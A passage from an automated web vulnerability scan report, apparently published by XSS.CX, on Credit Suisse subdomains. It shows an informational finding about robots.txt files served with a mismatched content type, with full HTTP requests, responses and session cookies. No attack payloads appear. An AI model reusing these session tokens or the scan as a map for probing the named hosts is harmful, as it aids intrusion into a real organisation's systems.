Last-Modified: Wed, 03 Mar 2010 11:04:02 GMT
ETag: "100000002a048-1d0-480e370a8fddf"
Accept-Ranges: bytes
Content-Length: 464
Connection: close
Content-Type: text/html

<body bgcolor="#FFFFFF">
<br>
<table cellpadding="2" cellspacing="2" width="330" align="center">
<tr>
<td align="center"><img src="logo.gif" alt="" border="0" align="middle"></td>
</t
...[SNIP]...

12. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


12.1. https://emagazine.credit-suisse.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://emagazine.credit-suisse.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /robots.txt HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:32 GMT
Server: Apache
Last-Modified: Wed, 06 Jul 2011 09:24:57 GMT
ETag: "1000000026698-3fb-4a7632c869803"
Accept-Ranges: bytes
Content-Length: 1019
Connection: close
Content-Type: text/plain

# robots.txt zu http://emagazine.credit-suisse.com


User-agent: Ultraseek
Allow: /

User-agent: Credit_Suisse_Search_Engine
Allow: /

User-agent: Credit Suisse Search Engine
Allow: /

Use
...[SNIP]...

12.2. https://infocus.credit-suisse.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /robots.txt HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:21 GMT
Server: Apache
Last-Modified: Wed, 06 Jul 2011 09:24:57 GMT
ETag: "1000000026698-3fb-4a7632c869803"
Accept-Ranges: bytes
Content-Length: 1019
Connection: close
Content-Type: text/plain

# robots.txt zu http://emagazine.credit-suisse.com


User-agent: Ultraseek
Allow: /

User-agent: Credit_Suisse_Search_Engine
Allow: /

User-agent: Credit Suisse Search Engine
Allow: /

Use
...[SNIP]...

12.3. https://responsibility.credit-suisse.com/robots.txt  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /robots.txt HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:19 GMT
Server: Apache
Last-Modified: Wed, 06 Jul 2011 09:24:57 GMT
ETag: "1000000026698-3fb-4a7632c869803"
Accept-Ranges: bytes
Content-Length: 1019
Connection: close
Content-Type: text/plain

# robots.txt zu http://emagazine.credit-suisse.com


User-agent: Ultraseek
Allow: /

User-agent: Credit_Suisse_Search_Engine
Allow: /

User-agent: Credit Suisse Search Engine
Allow: /

Use
...[SNIP]...

Report generated by XSS.CX at Mon Sep 19 15:39:11 CDT 2011.